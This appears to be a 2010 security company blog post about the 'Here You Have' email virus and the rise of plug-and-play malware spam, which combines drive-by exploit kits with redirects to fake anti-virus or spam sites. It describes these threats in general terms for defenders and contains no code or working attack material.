Earlier this month, the world was all abuzz with the “Here You Have…” virus, which threatened a number of big companies, including ABC/Disney, Google, Coca Cola and NASA. In fact, on September 9, 2010 when the virus was first detected, it ranked as the number two search on Google. The emails in the campaign included a link that encouraged users to click on a link that contained a PDF file. The file actually contained a Windows script that infected computers with a virus and then spammed the contact list of the person who opened the file. According to a WSJ.com article, “The virus took down email servers at U.S. space agency NASA and companies such as cable giant Comcast Corp.”
While the spam campaign was annoying, it proved to be a low-level threat that simply got a lot of air time. Most experts were even surprised that the old school social engineering tactics actually continue to trick security systems and users, and that the virus was not seeking banking or financial information like most of today’s campaigns, including the ongoing plug-and-play malware campaigns that we have monitored since the beginning of the year. PNP malware represents a significant threat to users because of the level of sophistication and constantly evolving techniques for convincing email recipients to click on a link or download an attachment.
However over the past few months or so, PNP scammers have been using several tactics in their emails to infect computer systems:
- Direct link to drive-by host (commonly seen in the brand spoofs)
- Attaching .html to the message which contains obfuscated JavaScript that directs the browser to the drive-by host (common with the “personal emails”, and spoofs)
- Attaching executables directly to the message (somewhat rarer form)
Both one and two are equally dangerous and essentially require just one user action to initiate the attack. Opening the (oft presumed safe) HTML attachment, or clicking on the call-to-action link is enough to start the chain reaction. The attached executables take a couple more clicks, but apparently enough people still fall for this to make the technique worthwhile.
I described these variants a few weeks ago here: http://www.redcondor.com/blog/?p=356
The first two I would classify as PNP. The third type has essentially the same structure, but does not involve the browser, yet still appears to be generated by the same group of scammers responsible for the PNP campaigns.
The core of the PNP technique is to get a user’s browser to interact with the drive-by host, which brings the victim into contact with an exploit kit. The second component is the redirect to some secondary page after the exploit-kit has its chance to infect the user.
Earlier in the year, this drop site tended to be a Canadian Pharmacy site or Replica Rolex site (very common spam websites). What we are seeing more frequently, is that the drop site is some kind of social engineering hack to get the user to voluntarily download malicious software. Examples of the latter are fake software “updates” and the current trend of Fake Anti-Virus sites. Both types of drop sites are associated with CPA (cost per action) and PPI (pay per install) respectively. In other words, there are at least two chances of monetizing from each user’s fulfillment of the single ill-fated call to action.
This combination of exploit kit + redirect is the essence of the PNP attack strategy. The reason why this is so striking and infinitely more dangerous to users is that any spam campaign with a browser-involved call to action (i.e. almost all spam) can be easily augmented with the PNP approach. This means that a campaign that would have been sent anyway can have a secondary component that brings the user’s browser into contact with an exploit kit before landing on the “normal” spam page. There are numerous benefits to the spammer in doing this.
While the technique seems to be limited to a smaller subset of spammers, the scammers may not even realize the potential this approach has. It also could be that that only the top tier spammers have access to the platform, and we will start to see a greater uptake in the technique once the software percolates down to the lower tiers. We are finally starting to see respectable volume from these campaigns as of just this past week. See our release on the recent rise.
One way or another, this technique has its roots extending back about a year now, so I think it’s safe to say that it is a relatively permanent feature of spam going forward, as I initially speculated earlier in the year. The one thing that could change its permanence is if browsers get very good at detecting/blocking this technique. Google’s Safe Browsing, for example, has made great strides in this realm compared to the beginning of the year.
Unfortunately, while the world was somewhat distracted by the relatively tame “Here You Have…” virus, it appears that the PNP scammers continue to change their techniques, progress in their ability to get the messages to more unsuspecting email users and evolve to bypass security systems.
